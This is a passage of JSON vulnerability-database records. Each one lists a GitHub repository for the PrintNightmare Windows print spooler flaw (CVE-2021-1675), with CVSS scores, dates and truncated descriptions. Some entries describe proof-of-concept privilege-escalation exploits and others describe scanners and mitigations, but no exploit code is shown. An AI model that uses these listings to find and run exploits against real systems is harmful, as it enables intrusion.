"impactScore": 5.9}, "published": "2021-07-07T08:32:09", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675"], "modified": "2022-08-05T17:41:41", "id": "98CEA984-CF02-58F6-91D5-967F8D36F94A", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T15:05:05", "description": "# CVE-2021-1675(PrintNightmare)\nsystem shell poc for CVE-2021-16...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-05T14:17:03", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675"], "modified": "2022-08-18T03:47:07", "id": "B3985759-BBD2-5956-860D-E6361564C262", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-15T21:31:23", "description": "# CVE-2021-1675 - PrintNightmare LPE (PowerShell)\n\n> Caleb Stewa...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-01T23:45:58", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675"], "modified": "2022-08-15T15:41:52", "id": "F1C20A6A-5492-50FE-BB94-25D35B1459EC", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T09:14:22", "description": "# Microsoft-CVE-2021-1675\n\nI have created a small C# project tha...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-16T18:06:05", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675"], "modified": "2022-04-20T11:31:25", "id": "645DABC8-04DA-51BF-A20F-68F611D2D666", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-30T03:47:47", "description": "# CVE-2021-1675\n\nImpacket implementation of the [PrintNightmare ...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-01T12:24:19", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675"], "modified": "2022-01-30T02:59:13", "id": "FFBC2747-5957-57B1-9DD9-AB2BAFCB7BD6", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-15T19:34:33", "description": "# C# PrintNightmare (CVE-2021-1675)\n\nYou'll need a DLL to use Sh...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-26T20:46:23", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675"], "modified": "2022-04-15T13:58:04", "id": "9CC224C9-907A-5219-8EFD-A94F15DE0ADD", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:35:44", "description": "# CVE-2021-1675-PrintNightmare\nWorking PowerShell POC\n\nPowershel...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-05T19:24:23", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675"], "modified": "2021-10-24T06:08:06", "id": "1883DF48-6A75-5743-AC93-56292D93A794", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:22:33", "description": "================================================================...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-03T01:04:06", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675"], "modified": "2021-10-24T06:03:36", "id": "3D6A6F0D-C38E-5819-A3A7-817A49825CBE", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:22:34", "description": "# CVE-2021-1675 - PrintNightmare LPE (PowerShell)\n\n> Caleb Stewa...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-02T16:12:15", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675"], "modified": "2021-12-08T22:23:08", "id": "B26A6295-2D2D-508F-B94C-38B6944F8A1F", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:24:27", "description": "## CarbonBlack Hunting Query for CVE-2021-1675 (PrintNightmare)\n...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-02T07:30:24", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675"], "modified": "2021-10-24T04:57:49", "id": "17B904FB-7F3D-54F1-B1B5-069C67184EE5", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:22:38", "description": "# CVE-2021-1675\nFix without disabling Print Spooler\n\nScript chec...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-01T19:50:46", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675"], "modified": "2021-08-05T03:00:30", "id": "9A318669-DAF8-50FF-A5DF-E390E0386254", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:22:37", "description": "# CVE-2021-1675 - PrintNightmare LPE (PowerShell)\n\n> Caleb Stewa...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-02T06:14:29", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675"], "modified": "2021-12-10T13:43:31", "id": "272E1B9F-32B1-5E4A-A0A9-44AC16DA37DB", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-18T14:23:47", "description": "# CVE-2021-1675-SCANNER\nVulnerability Scanner for CVE-2021-1675\n...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-02T01:45:00", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675"], "modified": "2022-03-18T12:17:15", "id": "A66D9AD7-B29D-5C48-B247-D8ACFCAE9BC7", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:22:44", "description": "# CVE-202...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-29T14:24:30", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675"], "modified": "2021-09-15T02:02:40", "id": "BB9DA286-F06B-5A55-B344-1196B32F3C2B", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:28:28", "description": "## \u3016EXP\u3017Ladon\u6253\u5370\u673a\u6f0f\u6d1e\u63d0\u6743CVE-2021-1675\u590d\u73b0\n\nhttp://k8gege.org/p/CVE-202...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-11T03:48:25", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675"], "modified": "2021-11-14T07:52:13", "id": "C6AE3BFC-9BBB-5327-8845-C88ABB6FEE40", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-27T15:43:57", "description": "# CVE-2021-1675 LPE PoC\r\n\r\nnot my exploit! just wanted to play a...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-12-05T14:49:32", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675"], "modified": "2023-03-13T03:40:27", "id": "AF2B8EF5-A739-53BD-8B8D-04A8C441268C", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-23T13:07:17", "description": "# PrintNightmareScanner\nScanner to detect Windows Print Spooler ...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-01T13:58:01", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675"], "modified": "2022-07-23T07:58:37", "id": "895FF449-0383-5007-9352-FABB3E8BD54C", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-27T15:44:03", "description": "# CVE-2021-1675 LPE PoC\r\n\r\nnot my exploit! just wanted to play a...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-12-05T14:49:32", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675"], "modified": "2023-03-13T03:40:27", "id": "AD904001-0962-5826-AD78-253E0FB3B7B7", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:29:17", "description": "# CVE-2021-1675-Mitigation-For-Systems-That-Need-Spooler\nA tempo...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-02T21:18:11", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675"], "modified": "2021-10-24T04:59:14", "id": "2A12C3BB-2A75-5B33-AE9B-348DB656AC81", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T09:15:44", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-30T18:32:17", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675"], "modified": "2022-07-27T07:12:56", "id": "4E279194-AC85-5607-A943-AC23EADADEF7", "href": "", "cvss": {"score": 